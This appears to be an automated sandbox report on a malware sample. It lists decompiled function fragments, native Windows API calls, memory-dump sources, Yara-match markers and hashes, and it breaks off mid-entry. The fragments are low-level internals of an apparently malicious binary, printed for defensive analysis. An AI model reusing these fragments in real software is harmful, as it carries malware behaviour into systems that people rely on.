                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                      				int _t10;
                                      				void* _t15;
                                      
                                      				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                      				return _t10;
                                       			}

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: 2e37f0a78afbb191663dee5913bf4466ca98e8be0ad353d73eadfcbe087a9ab3
                                      • Instruction ID: ea8e1d95aa463106d7998eac378d95181b94b8865d117edf770d4ae0ec492ebb
                                      • Opcode Fuzzy Hash: 2e37f0a78afbb191663dee5913bf4466ca98e8be0ad353d73eadfcbe087a9ab3
                                      • Instruction Fuzzy Hash: 22E026B4104346ABDB10EF69D880897BB95FFC0314300860EF84847703C234C8AACB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00418930(intOrPtr _a4, int _a8) {
                                      				void* _t10;
                                      
                                      				_t5 = _a4;
                                      				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                      				ExitProcess(_a8);
                                       			}

                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                      • Instruction ID: 8a38b42fe32e271f9afc1009965e08f4e64431d8948f43410f85fe4134f53a69
                                      • Opcode Fuzzy Hash: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                      • Instruction Fuzzy Hash: 8FB092B29064C5CAEB11E7B04A08B2B7E04BBE0741F27C076E2120681B4778C491F6B6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      C-Code - Quality: 23%
                                      			E0040C37A(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, void* __esi, void* __fp0) {
                                      				signed char _t9;
                                      				int _t10;
                                      				signed char _t22;
                                      				void* _t25;
                                      
                                      				_t9 = __eax | __edx;
                                      				_t10 = _t9;
                                      				if(_t9 < 0) {
                                      					asm("popad");
                                      					asm("xlatb");
                                      					 *((intOrPtr*)(_t25 - 0xbe4f5c8)) =  *((intOrPtr*)(_t25 - 0xbe4f5c8)) - _t10;
                                      					asm("adc bl, ah");
                                      					asm("adc edx, [ebx-0x7fce734]");
                                      					asm("rol byte [esi-0x3e769a20], 0x1a");
                                      					asm("loopne 0x29");
                                      					asm("adc [ebx], ebp");
                                      					_t22 = 0x000000e6 | __ebx;
                                      					asm("loopne 0x7c");
                                      					 *(_t25 - 1 + 0x60bdaec3) =  *(_t25 - 1 + 0x60bdaec3) ^ __ebx;
                                      					asm("adc [edi+0x21], ebx");
                                      					asm("a16 salc");
                                      					_push(_t22);
                                      					return _t22;
                                      				} else {
                                      					asm("xlatb");
                                      					asm("aam 0xa3");
                                      					memset(_t25, _t10, __ecx << 2);
                                      					asm("lodsd");
                                      					return __ebx;
                                      				}
                                       			}

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4befdd1ed447d5a491e2625f79c49951acdd7135b8cea54b24b745616e202cc1
                                      • Instruction ID: a87379bcd7b92c99abfc46f2d2f3fa94bbfbab64f5b3365853ef1ef2123a839f
                                      • Opcode Fuzzy Hash: 4befdd1ed447d5a491e2625f79c49951acdd7135b8cea54b24b745616e202cc1
                                      • Instruction Fuzzy Hash: 7B017072A4519187C7024E65AC946E2F771FBC3351B1C12BBCC49AF183D3784C5597DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp
                                       • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6393dcddf63f7da8b22a4cbd0a0f9bd6a52331a432dc385b2df44f5c290544da
                                      • Instruction ID: 376fee84827810746c10649541411dfdc4a617a4fc65b6144471750feda61f77
                                      • Opcode Fuzzy Hash: 6393dcddf63f7da8b22a4cbd0a0f9bd6a52331a432dc385b2df44f5c290544da
                                      • Instruction Fuzzy Hash: 79F09E73E4459286D3419E6098442F1F762FBC3316B2C13AFCC8967402D354581286CA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       C-Code - Quality: 53%
                                       			// Decompiler output for the function at 0x00B0FDDA in the 00A50000 memory dump.
                                       			// The two format strings match ntdll's critical-section wait diagnostics;
                                       			// E00B05720 is the debug-print helper being called, and E00ABCE00 is likely the
                                       			// 64-bit divide that converts the 100ns timeout to seconds
                                       			// (0xffffffffff676980 is -10,000,000, i.e. one second in 100ns units).
                                       			E00B0FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                       				void* _t7;
                                       				intOrPtr _t9;
                                       				intOrPtr _t10;
                                       				intOrPtr* _t12;
                                       				intOrPtr* _t13;
                                       				intOrPtr _t14;
                                       				intOrPtr* _t15;
                                       
                                       				_t13 = __edx;                            // __edx points at the 64-bit timeout value
                                       				_push(_a4);
                                       				_t14 =  *[fs:0x18];                      // TEB self pointer (32-bit process)
                                       				_t15 = _t12;                             // RTL_CRITICAL_SECTION* being waited on
                                       				_t7 = E00ABCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);  // timeout in seconds
                                       				_push(_t13);
                                       				E00B05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                       				_t9 =  *_t15;                            // RTL_CRITICAL_SECTION.DebugInfo
                                       				if(_t9 == 0xffffffff) {                  // no debug info attached
                                       					_t10 = 0;
                                       				} else {
                                       					_t10 =  *((intOrPtr*)(_t9 + 0x14));  // RTL_CRITICAL_SECTION_DEBUG.ContentionCount
                                       				}
                                       				_push(_t10);                             // ContentionCount
                                       				_push(_t15);                             // Critical Section address
                                       				_push( *((intOrPtr*)(_t15 + 0xc)));      // RTL_CRITICAL_SECTION.OwningThread
                                       				_push( *((intOrPtr*)(_t14 + 0x24)));     // TEB.ClientId.UniqueThread (Tid)
                                       				// first format argument is TEB.ClientId.UniqueProcess (Pid)
                                       				return E00B05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                       			}
                                       Disassembly listing: instruction addresses 0x00b0fdda through 0x00b0fe40 (instruction text not preserved in this extraction)

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0FDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B0FE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B0FE2B
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378918668.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                      • Instruction ID: acea7fd983f31da6c1ca6c994c62319758937d631e160ad9cbbf45cef84d7896
                                      • Opcode Fuzzy Hash: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                      • Instruction Fuzzy Hash: 6EF0F632200601BFD6301A45DC06F73BFAAEB44730F240354F628565E2DA62FC2097F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02F23BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F23BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02F2862D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 8749f80faae6d9f9409aa75c61280400cc64edf9b88f9ed251a6fdadc2f594db
                                      • Instruction ID: 6f18d2506b33dccc98d05c48e3dd4e1549d1eafaf2c7fabb380a85a497b61619
                                      • Opcode Fuzzy Hash: 8749f80faae6d9f9409aa75c61280400cc64edf9b88f9ed251a6fdadc2f594db
                                      • Instruction Fuzzy Hash: 7901C9B6215208AFCB48CF88DC84DEB77A9FF8C354F158248FA1D97240C630E815CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02F23BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F23BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02F2862D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: 701e3baa54f8e2d1500a16ed6031a7d030696d9a7f1944c1d6473eabcbaa2b76
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 6FF0BDB2204208ABCB08CF89DC84EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02F12D11,00002000,00003000,00000004), ref: 02F287F9
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: 6e10bbfe5814aee85482eca774f783ce8ead1bf4672ac8c03b74f48e5f60a76f
                                      • Instruction ID: 52d060d22bc7e0e8db3e9683cb71dab2a8df35e83f7d4d2324ffa815b818037d
                                      • Opcode Fuzzy Hash: 6e10bbfe5814aee85482eca774f783ce8ead1bf4672ac8c03b74f48e5f60a76f
                                      • Instruction Fuzzy Hash: 4F1126B6200218AFDB14EF88DC84EEB77ADEF88790F148559FA1897241C630E914CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02F23BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F23BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02F2862D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: cdbf8246b2d32eeb3f7be1ab4334beb16d648d2fe006f59e8175a92027b2e7b9
                                      • Instruction ID: d757afbe2f0a4c7ecd596764865bd77cad04b4d60b077c2900101774f88a78cf
                                      • Opcode Fuzzy Hash: cdbf8246b2d32eeb3f7be1ab4334beb16d648d2fe006f59e8175a92027b2e7b9
                                      • Instruction Fuzzy Hash: FB0144B6200108AFDB08DF98DD85EEB77AEEF8C654F148249FE4D97240C630E801CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(02F23D72,5E972F65,FFFFFFFF,02F23A31,?,?,02F23D72,?,02F23A31,FFFFFFFF,5E972F65,02F23D72,?,00000000), ref: 02F286D5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 4aead9036738c78546b82a68ddc627b01333e25613207ad84ee075bebe1ce1f1
                                      • Instruction ID: 4bc690b754f8e6a7d0724a7db0723221a6e912f487b817cab074fce2234b82e7
                                      • Opcode Fuzzy Hash: 4aead9036738c78546b82a68ddc627b01333e25613207ad84ee075bebe1ce1f1
                                      • Instruction Fuzzy Hash: D3F0F4B2200108AFDB04CF99DC80EEB77AAAF8C354F118249BA0DD7244C630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(02F23D72,5E972F65,FFFFFFFF,02F23A31,?,?,02F23D72,?,02F23A31,FFFFFFFF,5E972F65,02F23D72,?,00000000), ref: 02F286D5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: 9f3a8ce9d5d0bfd2e1fd792b46953fdedcb7ae641f11ac93df114f4e95253abe
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 71F0A4B2200218ABDB14DF89DC84EEB77ADAF8C754F158248BE1D97241D630E911CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02F12D11,00002000,00003000,00000004), ref: 02F287F9
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: fdb88fe11a89153a8428005a6bc0aecf625e4ce6066f47e3c055aa72856218c8
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: EEF015B2200218ABDB14DF89CC80EAB77ADAF88750F118148FE0897241C630F910CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(02F23D50,?,?,02F23D50,00000000,FFFFFFFF), ref: 02F28735
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: f62a853a107ce3b9ab7459f913f40cca34560af4ec78ce89cac77094df95139b
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: 8BD012752002146BD710EB99CC45E97775DEF44750F154455BA585B241C570F600C6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(02F23D50,?,?,02F23D50,00000000,FFFFFFFF), ref: 02F28735
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: efe8b76b91f1ba65273ecf2fed5e3118163f63a85d2a39fa944af79593a340db
                                      • Instruction ID: 7a87eb76a64c33f32a6d3c18d729eca122884d4db186855151c7900b7ae09620
                                      • Opcode Fuzzy Hash: efe8b76b91f1ba65273ecf2fed5e3118163f63a85d2a39fa944af79593a340db
                                      • Instruction Fuzzy Hash: 96D02EAD40D2C00BDB10EAB8A8C10827F80EE812587280A8ED8A807203C168E20A9690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 74dbbf65c0f8807c6bce3a1add5fb5179ac1b2b845943a27d8dee9a158b20c12
                                      • Instruction ID: 1f47bcf4c908087ab1a289f7d4d20727a7925d7541bc4ac1d57eb46007cb806a
                                      • Opcode Fuzzy Hash: 74dbbf65c0f8807c6bce3a1add5fb5179ac1b2b845943a27d8dee9a158b20c12
                                      • Instruction Fuzzy Hash: 1790026121184446F610A5694C14B0700459BD4343F51C125A0145554CCA5588617561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7c0d37a5e4278a73724e4d53d40443e79a1fdb16e89ce374e78737f992e39afd
                                      • Instruction ID: c9259f2284185dd02d6b7b9e9c1d5f4d2807931c277d247bc9c740638e5119d2
                                      • Opcode Fuzzy Hash: 7c0d37a5e4278a73724e4d53d40443e79a1fdb16e89ce374e78737f992e39afd
                                      • Instruction Fuzzy Hash: EA9002B120104806F550B159440474600459BD4341F51C021A5055554E87998DD576A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7ccc939d0b31140adb33cee2d21ef71724ebd225d1a87f4eae06de9ac09f632a
                                      • Instruction ID: 4b139668a566c3187901403d6413e67f796ecd8a07900abff1f8dd5b618853e5
                                      • Opcode Fuzzy Hash: 7ccc939d0b31140adb33cee2d21ef71724ebd225d1a87f4eae06de9ac09f632a
                                      • Instruction Fuzzy Hash: D49002A134104846F510A1594414B060045DBE5341F51C025E1055554D8759CC527166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6d0a6a7acb310ec7a190665bd8c9f86f6f97144ca1d0ef791ff21d32a6a703eb
                                      • Instruction ID: e00ee4f5a2989750e260400931adc2d85cf9f58560eb605a12ec6f196d6699b2
                                      • Opcode Fuzzy Hash: 6d0a6a7acb310ec7a190665bd8c9f86f6f97144ca1d0ef791ff21d32a6a703eb
                                      • Instruction Fuzzy Hash: ED90027120104817F521A159450470700499BD4281F91C422A0415558D97968952B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 89f0c771f7f7860c27f9b311d3578deb8efb2c6f526bf0175d4c15c9ef788004
                                      • Instruction ID: 2a3fe56e6f98d2f99a5a0ad220aa303f09ee3fc32e4500bffc96baca59463233
                                      • Opcode Fuzzy Hash: 89f0c771f7f7860c27f9b311d3578deb8efb2c6f526bf0175d4c15c9ef788004
                                      • Instruction Fuzzy Hash: AE900261242085567955F15944045074046ABE4281791C022A1405950C86669856F661
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b657588bee2ae08c32d1552fbc4f7e25ab8d36ef7008f0e8aa22faeda91ae050
                                      • Instruction ID: 3ed94147959c8bfeff822efa233fccf6aaff572399eb088af6939ac4a97f92c9
                                      • Opcode Fuzzy Hash: b657588bee2ae08c32d1552fbc4f7e25ab8d36ef7008f0e8aa22faeda91ae050
                                      • Instruction Fuzzy Hash: 0890027120104806F510A599540864600459BE4341F51D021A5015555EC7A588917171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 27caf313e9e88b1248ff14ebf9e189ed62ef8fdbe33ecfd8c2567731eabb06b7
                                      • Instruction ID: 968836a356bbc50b6db916cb4da0638f757c1581214a11fc1c687f449b24a314
                                      • Opcode Fuzzy Hash: 27caf313e9e88b1248ff14ebf9e189ed62ef8fdbe33ecfd8c2567731eabb06b7
                                      • Instruction Fuzzy Hash: 2E90027131118806F520A159840470600459BD5241F51C421A0815558D87D588917162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 612be1965258382ffa70403b10132a1e294eebd792e73977c74b720e6bc7d662
                                      • Instruction ID: 247e05d038e035370285974ab3424d2a4d534fd2ce22a3df1cb52e6912df155a
                                      • Opcode Fuzzy Hash: 612be1965258382ffa70403b10132a1e294eebd792e73977c74b720e6bc7d662
                                      • Instruction Fuzzy Hash: 5990026921304406F590B159540860A00459BD5242F91D425A0006558CCA5588697361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c717976e7140832f04c51248ecafc7db837c30df9fb55ad95f13a4f6923f5af1
                                      • Instruction ID: 7998b3169f93fd9ac942240708fc609f768b297fd6a1339528a0f9cd96e2b501
                                      • Opcode Fuzzy Hash: c717976e7140832f04c51248ecafc7db837c30df9fb55ad95f13a4f6923f5af1
                                      • Instruction Fuzzy Hash: C790027120104C06F590B159440464A00459BD5341F91C025A0016654DCB558A5977E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
